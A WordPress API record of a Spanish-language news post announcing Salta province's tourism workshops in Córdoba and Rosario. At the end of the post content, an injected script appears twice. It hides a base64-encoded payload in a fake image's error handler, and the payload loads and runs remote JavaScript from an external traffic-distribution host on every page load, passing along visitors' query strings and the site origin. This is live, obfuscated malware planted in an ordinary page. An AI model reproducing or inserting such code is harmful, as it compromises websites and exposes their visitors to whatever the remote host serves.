{"id":1342,"date":"2022-08-22T09:52:09","date_gmt":"2022-08-22T12:52:09","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1342"},"modified":"2025-08-14T00:37:53","modified_gmt":"2025-08-14T03:37:53","slug":"salta-se-promocionara-en-cordoba-y-rosario","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1342","title":{"rendered":"Salta se promocionar\u00e1 en C\u00f3rdoba y Rosario"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#ad143a\">Esta semana en C\u00f3rdoba y Rosario se presentar\u00e1 la oferta tur\u00edstica de la provincia con workshops y presencia promocional en la v\u00eda p\u00fablica.<\/h4>\n\n\n\n<p>El Ministerio de Turismo y Deportes participar\u00e1 el martes 23 del Workshop que la C\u00e1mara de Turismo de Salta realizar\u00e1 en el Hotel La Ca\u00f1ada de C\u00f3rdoba desde las 10 hasta las 15 hs. La inauguraci\u00f3n se llevar\u00e1 a cabo a las 12.30 &nbsp;ante invitados especiales y prensa especializada.<\/p>\n\n\n\n<p>La presencia promocional de Salta inicia hoy con acciones en la v\u00eda p\u00fablica en el Buen Pastor, un espacio t\u00edpico de la capital cordobesa.<\/p>\n\n\n\n<p>La actividad se reiterar\u00e1 en Rosario el jueves 25 en el hotel Ariston de 10 a 15. Un d\u00eda antes tambi\u00e9n Salta tendr\u00e1 presencia en la v\u00eda p\u00fablica de esta ciudad.<\/p>\n\n\n\n<p>En ambas actividades se presentar\u00e1 la propuesta tur\u00edstica de la provincia y se ofrecer\u00e1 degustaci\u00f3n de gastronom\u00eda regional y vinos de altura. Se trata de dos mercados nacionales estrat\u00e9gicos y servir\u00e1 para reforzar la presencia del destino.<br>&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/salta-se-promocionara-en-cordoba-y-rosario-84396\" target=\"_blank\" rel=\"noreferrer noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Esta semana en C\u00f3rdoba y Rosario se presentar\u00e1 la oferta tur\u00edstica de la provincia con workshops y presencia promocional en la v\u00eda p\u00fablica. El Ministerio de Turismo y Deportes participar\u00e1 el martes 23 del Workshop que la C\u00e1mara de Turismo de Salta realizar\u00e1 en el Hotel La Ca\u00f1ada de C\u00f3rdoba desde las 10 hasta las [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1343,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14],"tags":[],"class_list":{"0":"post-1342","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1342"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1342"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1342\/revisions"}],"predecessor-version":[{"id":7385,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1342\/revisions\/7385"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1343"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1342"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1342"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1342"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}